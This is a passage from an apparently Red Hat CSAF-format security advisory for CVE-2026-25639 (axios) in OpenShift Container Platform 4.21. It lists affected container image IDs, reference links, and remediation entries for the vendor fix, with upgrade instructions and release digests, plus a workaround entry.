"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:cdea677053f22dfbac5d00aad0b562674f4141e7450c7c88072407104275e709_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:1356eb99499d3ee7f4b127a5a3de8c2f97b1ad0b7fd92a508eec43b1ecd0d5b3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:2ac33325bea90b62eddee0e60b1ae0895025c185eaa53ce282f4fb67a0cd42d7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:42ccddde25579f460d4d44bb64d6d6413460678db55538c23c9ba1409cdc5648_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:db21a1f0033fc83923453b258ea1dd38bf649ae3c4d3c4ef2301d4ce943b6bb0_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:30ce84b72533a1bafc328c4fa4cd97eeb4491e235cba8fff6c48756dab8e8271_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:6ef682c9b130a604095f29fd22801d700a8126af83838690377c796c831ac0d0_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:c11fd98702ea065a5addcf840a6144d9df3f7f3bc4901fb3d9873b72f773ccc0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:e0fcb23ee5c2635b54bf9c2b3b29d4f2bb1eb237db7ac2c0cc01be4dcb087fdd_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:21a29815d5d3fd34632ef852217f63319e3d5fdec795fae749e38d6381c29c15_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:3c2ae4e3bd8501436ec135700a13a6ed29ad6080cd151fd932646639787148a0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:a6c7b7806fe1443ead913b7ea3cde3f768626d9dcb09089f60de3aa8c3681ff5_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:ff3f16308fcee12fe291fdc043366343c88bd30b9b449b646e548d36d3872077_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:20d0529049b4723cc2ee5a4996b751369d23ed770333a0e2710e0b7d74bbc46f_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:890269820c3fd7d222f60758203acb844003ad14b90c143dbd4a50790143947b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:9774825c7f2e8541d9c3b03d1870add013b974b1a52224b08cf5ce3894d473d7_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:e52888476811447f15ac1a8aa5aa7c6a0610c27cfe996736b136027a475553a5_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:24e26ccdf054e4828cbf3196512d84304dca7c344219c979724e7d37a831c590_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:7bfcdd17d86d7585ffc6f25d4975e44b33ea51523f8afc27bace574b4da61ed1_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:9654c56daa0f42106d3a0ef75b134e4f8fa758894e1941548d122ff94b3677ca_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:e42fe14cfdf9c0a44404d009b1a42d7f1484316c227f3c480c8d0568cb41ef8c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:08ef837af0a9a51853c9f7fb17e98a834f1bc4b09b0dd06944b51fc88cdb532f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:568557a3b1c4c0f276e2c118e1ce052880a7f8941459b20a2ab84baf23085fec_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:ccc0e2cd71654109461a0304fc7f03fd1cb6232598a77c04ce4d62e9b8ce0fa6_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d40a51c40a9a37a20234160b94a1bf080cc07bdadfc3d53620fb59640a155e29_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:06651a72194c592504a75661234d93a2d81d6d54fc53ce58cc4d62f6e5344fac_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:476478ca6f4d476333feb32ad72d78df98357a02dfe1a488d10d6d7aac05e50e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:576ac2c2f80e7dc444be492df64d27145b626dc627bafe4d04c4dc3b464ee653_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:c471ff51606f3c56eb399d1b04bb035d97d6e81c470d2971c16371aba9a6d260_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:21055d354c6b6ad8850bc85223cab6a9173633524bafe31c1031b6f8693cd7d5_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:874d83aaac6d1573874c1b1703d7e68421e7c05777b10bb42bdb9c8faf136f04_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:8c77bc4638bb1745823c73a98ffb1d660b0d7b87aa93988a547f53bb10febea8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:b73de7bc71be22699d9ea7258ed2cb2b6ec21660546ed275032bc2c297cdbf29_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:571f8f0f56ce502e2e8a6429415cca31858805d05fe0a2d2dc06e1376f5d6958_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:7973e6e926dce93531a2fce68ceb4f1a08128167b1a92f73ce82bc254e314473_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:83cd8f29cb94e04be62a3eebeb0b5134ab867e77cc629f6df5996f015691698b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:b8e0c0d568c3167f8a409a257f0871c02f93d79ae84a6681d54ab6350177eeaa_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:02e33310f537d87191e72aa16de4bc7bbedcead6befdf0e686f9d08005df3872_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:6b733ac8700fec7ab2d0c8616014903eea9e5bb58bb03ca83b1deb0e2c3ea9a3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:993664caa045d8064cf2f00015af685e41ae820664ddbf7b404228095374c520_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:d11bece814725c67d10c4b050c11785a13bcd98115847b96e6ee984290dcd113_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:5d8e93e5f498d9d364e8b50c6f6c5c70d1ac9f1506b99629ff185abf6b28d608_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:60c1cde27e89223959f2cbec07a7c1408063814897ad8cc8837ca7051e79952f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:cedb78beee71d3e070da1e6bd2623ab65afbe4cbee379b1617a53ecedbdfe56a_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:cee1d005ccd6d9c94ca010bc87f3a9fbbb42425677f5a9d89f20e1752980ed5e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:29e39816ed2201098199d5dbdc5f97bb584e815a1212fcda98cc51d7fdcb7508_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:3204209247dc1156aeb75d1c39318ec9134b83a54971069948dddef1d6b6cd12_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:3c3b9853705634c467564bc083186c2ab5e12602b3120afd6f0f2e443a4f66e7_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:978dafa970007d31c2852bfb77988c32682286d57661009997b119887e48bec7_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:3cf987d5f69ec722a2b608f18a58526e86a063c29c222afd7ef574e64452bbc1_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:53f90f1a9d059664796d663821bccf37f895c9562a6d31674b7eaab675238135_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:7d0a851c8b32356a0d3c02e28ca29ddb899f41f1d0ad6abf03671b4dccea0de0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:dcc0c3762f4c80e5ae273da4e1fff620cc12d064d64489bac41ff83d8c88141c_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:18249c2a449d27f9c9d2d2914669bef0221e9d779630da939c8e45562e8eab55_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:251e0b536826e5353396f8069d508ef5f9cba6c38bc66be2aee9037759228834_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:848bdd1bed4275a4ea071b7351cafaed425fab7e82e3b71fb6d31b4a9a61d47a_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:b345413f9a1f1fef3738703c71bcb421b4eb795510637e8c5e8f6a20662035ad_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:1eb19e964813016a8287d03fbf76f10253b9403458297aac393cff083964bc86_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:844c042e56ff995d0fbcb560ca0bef9fe4799f7d4d36932034ea37fbc297c5cc_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:131459dfd1f4c159d75385b96fd46f8eb9aa260fd2b380406db49325bc858d6d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:8933b234c6bd8186738f18d257dfc32d35641538925b52afd1a0a13d65e22fc8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:04aaf3453b00bad5f560a3529744451850a7495a5b1c09d22602c4668d59334e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:4886d171f5973bfd35c0291181485bba6aa524eb8fc16d50a0fe58cf802e35f1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:12c93d59cee5e4b1e078728dcfff46a32d74022cadee43e8ba7ea6eec7c1550b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:13755e7b9d537d64ea31a50af4c425415aac6b2e73a6624c291b09cc10ccdc84_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2851992f2dc7ddfa802ec2902a59e3cb6c19f23b8810e770e82b487748610e64_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:61597437e96e4fe017f1156d30528ea4d14246b0d8e7b68c205c56f7a151283f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:b679772c7eb5295743d31ff4df6f1419084c02990679b86009c4708589fe6403_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:c16b49f06ab83306a1859620bc6b9721b8cd6af4a55248f55aad32da14b3b7c8_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:1304433ac42f7966801fc7adb9bab2cb85db100c27299f0817a60436a57118c5_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:4622e61163cba7f1fa87feddf2832e0c8cb4dae6fb70f41b6e03b39cb93770ff_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:9e390a25735b44286e3649b4872910720050d0f710feb67f914621db1913ce8e_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:b51f2f5767746f45c1a3092fe327d65f162b999c0e674764d861f168301b71e6_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:0101d5fe5eb0f2c3144ba364412dcd21c0c7b08c0beacd3fc5dd564767b2d9e0_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:0bc5a5a619cb16e67f81551ea4b96af7a8db26addfb202d9ca5ceab4168f459f_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5b379b10c95eb7a89203d552ee1c3437ce0afbe61fb0afbdff6f5f421962df5b_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:81cb7b7fa35e3474c1be5650beaf6f6e963ee2f739221d7226933e3aa6a3f226_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:313bd25c0339ea434c08a438eda7bd5e3323bf0e02934ee4d01eb31af658a07a_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:38ee956747c9e76adb8038bc81918a6fb8a800313a93cff8822d309466754b67_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:3d3258d77f4829041e29a9dea806a0041237646e65ad3c3007d7cd98ec15bfdc_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:da587c47cc75ef54935b580d8e40852523c707e52954bcccf0def9da3de88063_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:1a3732c862f54453a192ebf7727b2f0339909e2207b3ae809ffa321f14d1cc17_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:270d198ff926a597b38e25e78868bce6ffd76c9601ba71e56d6312f5a35e3d37_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:b45c8f4aa119aefaed6080c553d7414b4d25ddb0968147f1344c2a82671ad177_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:bcf37dd6a57b6d6ecbd834cf812adee2dc841b8bf1d08c21ea29a3c6aab4d405_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:5251c3ad369f33e07c6e24f482c562edce287bdae6b8e505ecb8d3cf09fc32be_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:7304e26ef6c8ab4d2c647cc2ba65af9a92fd0f1fead62da0c435d71b397aada8_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:c6abce790ae93c39059b7dbfef6899b2ec75ba1a9864509f6cce28b1d356407e_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:f39b80836b998e584dc235933e600ee12746a3bfb0079aea1476a1eecf8f446d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:399931f0229e6dd1c8da11cf570db838af5b8113d67e0071e8e7b1fdc59f735c_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:5df3c4493997002d40d9278e7ef6b90fb98905a2bba169b0410980d297bfade3_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:89b38bc6c2b4405d467684858b8a4f8980f6ad9d721e7ca75e9956f923639240_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:ab067ec0877565544332595cf9d023f4ad3479d940a8f3cb4f1eaf3f930d9e0f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:1659061e1d03edc348e920093f213b35e95512807ce7dd83b2f1bd0b012d7900_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:62075f81a8bc4ce5a7192023a80f2e27c2bc4fae547193776513d67fbddad601_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:750827c34059a77d8599b6171204bc17cf971c4b0e9470007f4db319df31c860_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:9324db9c450ee8a54926478918a4efa70943cbc29ae8e2e67f51fe60bfd75335_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:2d95f6a57074c1132b809a735cc09c4aaccbd08a2a689bc0ee87426f766733c3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:9b5c05ee9e7460a2a3fbf2539a4248581d4a69712a2be5601451019c52353cb2_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:b6809f3b2d4107dbb9e3338f63aa2f0646f19dd15a8980742e2aaa2e38d75362_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:c6e0d575be3fe6bab07ec95b244600e5eb6e8fcae5df1fd7b344381aae921c17_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:18f11df416a261b5f882d67f4de9a2dabbd8b80006ecabd033504d3b0fadb779_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:709239c59cc22bd41c553a7f30c147c4fb33ed6f560cba9ff976a966cc58dc3c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:af2f03bf9b66959ac4e8568bdf8ffe864faa8808bb6790b554b1c3d5d80ea112_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:bb8d6f977a5b10490657a0e713ce281ac0680bf68caf893c46fe9ca84093b4b1_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:3d7c4d5a5809c712563175779356907b945010bf1357b78382ae405d89a8fd57_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:4b5f35cd93750652837275a4227ee08c40b2b7769ffdeec8a4d7a32ace69bbce_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:5aefedbf52b1d9b3ce8f6283e0716d4706b82fde65461a6924889ee507dfaa87_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:a90a60e27885e3ac1f74d00cb255478652da90af02a3771750b8598a53e9e48a_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:15cf0592b04ce9f19f286634c3a03001ef16f37d89f7752222b167ccbae4f583_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:3a8ab1634350c3e9f3768b56beb304696d71f996f980ff3839c79e6eb4af1ea0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:b40b75179bce35e2b49402bd6e345f234223f6379a845972122b9ebeb36ac40a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:37bffa4965d7ec59ecbfe8abf0a23d1e0411f9445c27237f9ca923cd1b96cb66_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:4d2f0e638d7c2632738ffdca9c391df061bbbb623f67138031590ef31cde06e6_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:549711d0027ee642c77126ff2cc280fef4ac6fa4b28605b9cbda4e34e3fcedfc_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:5ae6198359a92af6c4b317806ec8a33ff53d44189d14561a8f8a3153d7afdb81_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:c4d991da60458b7fd027719a7fe411bdfe82b192e7e882767dda61037e28aa3e_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T14:21:18+00:00",
"details": "For OpenShift Container Platform 4.21 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.21/html/release_notes/\n\nYou may download the oc tool and use it to inspect release image metadata for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests may be found at https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.\n\nThe sha values for the release are as follows:\n\n (For x86_64 architecture)\n The image digest is sha256:90792dfb2c5ebb89007c02486efca50556a23650be0915c7546fc507ab05e0df\n\n (For s390x architecture)\n The image digest is sha256:e46ae87b7692e3fae73577f348a927f790d0e3864585a3b9f2f9896d5418ac1a\n\n (For ppc64le architecture)\n The image digest is sha256:69f38d2d2485473e99daa8a5f8cce2ecde6d6d25a7818f0fd358c0a0bdd3e3fe\n\n (For aarch64 architecture)\n The image digest is sha256:0a9a477c1bc0290f71685aa565da3c803898336ce00f8242e5a7207602a7bc4b\n\nAll OpenShift Container Platform 4.21 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.redhat.com/en/documentation/openshift_container_platform/4.21/html-single/updating_clusters/index#updating-cluster-cli.",
"product_ids": [
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:0932593cd3bb6cd2e2b9ecad5e3bbe2fdcd107785ab3f8b25596f4901d8ae33a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:33db1ea4989248c3760120da28f516110c25bec461090bed2b200505b3357470_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:57adf23fcec07626794be373afc7d776b9e384c23cfb53592cc1913b2b9bed00_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:7070ef2a6495712f2aa282baf40d7beabd5904b3256993681d573d83e172cbb6_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:0670c2bb289901d477fbc283a5aea07cd38d7a7e19b16a9ac16f681bc94b2c62_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:81399846b57621b98c097a30f13e778d9842a8dc443ce62a37dad974b1f7f439_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a4de71b4f22f9f5f46300ff38cfda0e4b5647f286fd5bd365d9e0a6cadd94d5d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:ac86e849e17e9a83d6683ed0469538f758a53aec6fbe89df675c66ef66f007e6_ppc64le",
